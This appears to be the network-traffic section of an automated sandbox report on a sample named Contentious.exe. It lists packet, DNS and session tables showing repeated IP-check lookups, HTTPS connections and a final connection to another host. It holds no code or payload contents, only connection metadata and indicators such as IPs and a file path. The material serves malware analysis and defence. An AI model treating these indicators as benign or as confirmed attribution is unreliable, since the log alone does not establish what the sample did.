Jul 25, 2024 09:56:47.189729929 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:47.192183018 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:47.192246914 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:47.192331076 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:47.192672968 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:47.192698956 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:47.325602055 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:47.655222893 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:47.660029888 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:47.660083055 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:47.794159889 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:47.794255018 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:47.794342041 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:47.796514034 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:47.801449060 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:47.802651882 CEST | 49740 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:47.806840897 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:47.806929111 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:47.807650089 CEST | 80 | 49740 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:47.807820082 CEST | 49740 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:47.807820082 CEST | 49740 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:47.814291000 CEST | 80 | 49740 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:49.885149002 CEST | 80 | 49740 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:49.886353970 CEST | 80 | 49740 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:49.886487007 CEST | 49740 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:49.886576891 CEST | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:49.886636019 CEST | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:49.886707067 CEST | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:49.886987925 CEST | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:49.887008905 CEST | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:50.421607971 CEST | 80 | 49740 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:50.421715021 CEST | 49740 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:50.883682013 CEST | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:50.885327101 CEST | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:50.885361910 CEST | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:51.028048038 CEST | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:51.028170109 CEST | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:51.028218985 CEST | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:51.029905081 CEST | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:51.098606110 CEST | 49743 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:51.110266924 CEST | 80 | 49743 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:51.110337019 CEST | 49743 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:51.110867023 CEST | 49743 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:51.118768930 CEST | 80 | 49743 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:52.869508028 CEST | 80 | 49743 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:52.891863108 CEST | 49744 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:52.891932964 CEST | 443 | 49744 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:52.892046928 CEST | 49744 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:52.899127007 CEST | 49744 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:52.899162054 CEST | 443 | 49744 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:53.028841972 CEST | 49743 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:53.454088926 CEST | 443 | 49744 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:53.456223965 CEST | 49744 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:53.456252098 CEST | 443 | 49744 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:53.587034941 CEST | 443 | 49744 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:53.587136030 CEST | 443 | 49744 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:53.587189913 CEST | 49744 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:53.589205027 CEST | 49744 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:53.593147993 CEST | 49743 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:53.594227076 CEST | 49745 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:53.598721981 CEST | 80 | 49743 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:53.598788977 CEST | 49743 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:53.599577904 CEST | 80 | 49745 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:53.599641085 CEST | 49745 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:53.599736929 CEST | 49745 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:53.606055021 CEST | 80 | 49745 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:55.177944899 CEST | 80 | 49745 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:55.185795069 CEST | 49746 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:55.185834885 CEST | 443 | 49746 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:55.186059952 CEST | 49746 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:55.186208010 CEST | 49746 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:55.186223030 CEST | 443 | 49746 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:55.217842102 CEST | 49745 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:55.673209906 CEST | 443 | 49746 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:55.683114052 CEST | 49746 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:55.683130026 CEST | 443 | 49746 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:55.795876026 CEST | 443 | 49746 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:55.795999050 CEST | 443 | 49746 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:55.796066046 CEST | 49746 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:55.796824932 CEST | 49746 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:55.800887108 CEST | 49745 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:55.802016973 CEST | 49747 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:55.810230970 CEST | 80 | 49745 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:55.810245037 CEST | 80 | 49747 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:55.810306072 CEST | 49745 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:55.810350895 CEST | 49747 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:55.810894012 CEST | 49747 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:55.819715023 CEST | 80 | 49747 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:57.163333893 CEST | 80 | 49747 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:57.165545940 CEST | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:57.165586948 CEST | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:57.165688038 CEST | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:57.165971994 CEST | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:57.165983915 CEST | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:57.216424942 CEST | 49747 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:57.644305944 CEST | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:57.649885893 CEST | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:57.649898052 CEST | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:57.766343117 CEST | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:57.766453981 CEST | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:57.766621113 CEST | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:57.767107010 CEST | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:57.770610094 CEST | 49747 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:57.771846056 CEST | 49749 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:57.776087999 CEST | 80 | 49747 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:57.776153088 CEST | 49747 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:57.777199030 CEST | 80 | 49749 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:57.777262926 CEST | 49749 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:57.777391911 CEST | 49749 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:57.782278061 CEST | 80 | 49749 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:58.525434971 CEST | 80 | 49749 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:58.526751041 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:58.526791096 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:58.526870966 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:58.527148962 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:58.527160883 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:58.575654030 CEST | 49749 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:59.017314911 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:59.019277096 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:59.019313097 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:59.167088032 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:59.167195082 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:59.167306900 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:59.167748928 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:59.171415091 CEST | 49749 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:59.172591925 CEST | 49751 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:59.176822901 CEST | 80 | 49749 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:59.176882029 CEST | 49749 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:59.177613020 CEST | 80 | 49751 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:59.177685022 CEST | 49751 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:59.177807093 CEST | 49751 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:59.182528019 CEST | 80 | 49751 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:57:00.643740892 CEST | 80 | 49751 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:57:00.646431923 CEST | 49752 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:57:00.646481037 CEST | 443 | 49752 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:57:00.646560907 CEST | 49752 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:57:00.647186041 CEST | 49752 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:57:00.647197962 CEST | 443 | 49752 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:57:00.685147047 CEST | 49751 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:57:01.142071962 CEST | 443 | 49752 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:57:01.144854069 CEST | 49752 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:57:01.144891024 CEST | 443 | 49752 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:57:01.269419909 CEST | 443 | 49752 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:57:01.269666910 CEST | 443 | 49752 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:57:01.269736052 CEST | 49752 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:57:01.270793915 CEST | 49752 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:57:06.912273884 CEST | 49751 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:57:06.917759895 CEST | 80 | 49751 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:57:06.917870998 CEST | 49751 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:57:06.920337915 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:06.920388937 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:06.920466900 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:06.921019077 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:06.921031952 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.555932999 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.556080103 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:07.558072090 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:07.558090925 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.558332920 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.559920073 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:07.604506969 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.604892015 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:07.604907990 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.855132103 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.855304956 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.855400085 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:07.856005907 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:54.658999920 CEST | 80 | 49740 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:57:54.660269976 CEST | 49740 | 80 | 192.168.2.4 | 158.101.44.242 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 25, 2024 09:56:37.145128012 CEST | 63412 | 53 | 192.168.2.4 | 1.1.1.1 |
Jul 25, 2024 09:56:37.404407024 CEST | 53 | 63412 | 1.1.1.1 | 192.168.2.4 |
Jul 25, 2024 09:56:43.295393944 CEST | 54397 | 53 | 192.168.2.4 | 1.1.1.1 |
Jul 25, 2024 09:56:43.302406073 CEST | 53 | 54397 | 1.1.1.1 | 192.168.2.4 |
Jul 25, 2024 09:56:44.880415916 CEST | 54894 | 53 | 192.168.2.4 | 1.1.1.1 |
Jul 25, 2024 09:56:44.888578892 CEST | 53 | 54894 | 1.1.1.1 | 192.168.2.4 |
Jul 25, 2024 09:57:06.912903070 CEST | 49208 | 53 | 192.168.2.4 | 1.1.1.1 |
Jul 25, 2024 09:57:06.919586897 CEST | 53 | 49208 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jul 25, 2024 09:56:37.145128012 CEST | 192.168.2.4 | 1.1.1.1 | 0x7de6 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 25, 2024 09:56:43.295393944 CEST | 192.168.2.4 | 1.1.1.1 | 0xf222 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 25, 2024 09:56:44.880415916 CEST | 192.168.2.4 | 1.1.1.1 | 0xb28f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 25, 2024 09:57:06.912903070 CEST | 192.168.2.4 | 1.1.1.1 | 0x180e | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jul 25, 2024 09:56:37.404407024 CEST | 1.1.1.1 | 192.168.2.4 | 0x7de6 | No error (0) | 185.98.5.168 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | checkip.dyndns.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | 158.101.44.242 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | 132.226.8.169 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | 193.122.130.0 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | 132.226.247.73 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | 193.122.6.168 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:44.888578892 CEST | 1.1.1.1 | 192.168.2.4 | 0xb28f | No error (0) | 188.114.96.3 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:44.888578892 CEST | 1.1.1.1 | 192.168.2.4 | 0xb28f | No error (0) | 188.114.97.3 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:57:06.919586897 CEST | 1.1.1.1 | 192.168.2.4 | 0x180e | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49737 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 25, 2024 09:56:43.313987970 CEST | 151 | OUT | |
Jul 25, 2024 09:56:44.039083958 CEST | 320 | IN | |
Jul 25, 2024 09:56:44.043277025 CEST | 127 | OUT | |
Jul 25, 2024 09:56:44.221239090 CEST | 320 | IN | |
Jul 25, 2024 09:56:45.821000099 CEST | 127 | OUT | |
Jul 25, 2024 09:56:47.189729929 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49740 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 25, 2024 09:56:47.807820082 CEST | 127 | OUT | |
Jul 25, 2024 09:56:49.885149002 CEST | 320 | IN | |
Jul 25, 2024 09:56:49.886353970 CEST | 320 | IN | |
Jul 25, 2024 09:56:50.421607971 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49743 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 25, 2024 09:56:51.110867023 CEST | 151 | OUT | |
Jul 25, 2024 09:56:52.869508028 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49745 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 25, 2024 09:56:53.599736929 CEST | 151 | OUT | |
Jul 25, 2024 09:56:55.177944899 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49747 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 25, 2024 09:56:55.810894012 CEST | 151 | OUT | |
Jul 25, 2024 09:56:57.163333893 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49749 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 25, 2024 09:56:57.777391911 CEST | 151 | OUT | |
Jul 25, 2024 09:56:58.525434971 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49751 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 25, 2024 09:56:59.177807093 CEST | 151 | OUT | |
Jul 25, 2024 09:57:00.643740892 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49736 | 185.98.5.168 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:41 UTC | 182 | OUT | |
2024-07-25 07:56:41 UTC | 341 | IN | |
2024-07-25 07:56:41 UTC | 16043 | IN | |
2024-07-25 07:56:41 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 2965 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49738 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:45 UTC | 84 | OUT | |
2024-07-25 07:56:45 UTC | 706 | IN | |
2024-07-25 07:56:45 UTC | 340 | IN | |
2024-07-25 07:56:45 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49739 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:47 UTC | 60 | OUT | |
2024-07-25 07:56:47 UTC | 710 | IN | |
2024-07-25 07:56:47 UTC | 340 | IN | |
2024-07-25 07:56:47 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:50 UTC | 84 | OUT | |
2024-07-25 07:56:51 UTC | 704 | IN | |
2024-07-25 07:56:51 UTC | 340 | IN | |
2024-07-25 07:56:51 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49744 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:53 UTC | 60 | OUT | |
2024-07-25 07:56:53 UTC | 706 | IN | |
2024-07-25 07:56:53 UTC | 340 | IN | |
2024-07-25 07:56:53 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49746 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:55 UTC | 60 | OUT | |
2024-07-25 07:56:55 UTC | 708 | IN | |
2024-07-25 07:56:55 UTC | 340 | IN | |
2024-07-25 07:56:55 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:57 UTC | 84 | OUT | |
2024-07-25 07:56:57 UTC | 716 | IN | |
2024-07-25 07:56:57 UTC | 340 | IN | |
2024-07-25 07:56:57 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49750 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:59 UTC | 84 | OUT | |
2024-07-25 07:56:59 UTC | 706 | IN | |
2024-07-25 07:56:59 UTC | 340 | IN | |
2024-07-25 07:56:59 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.4 | 49752 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:57:01 UTC | 84 | OUT | |
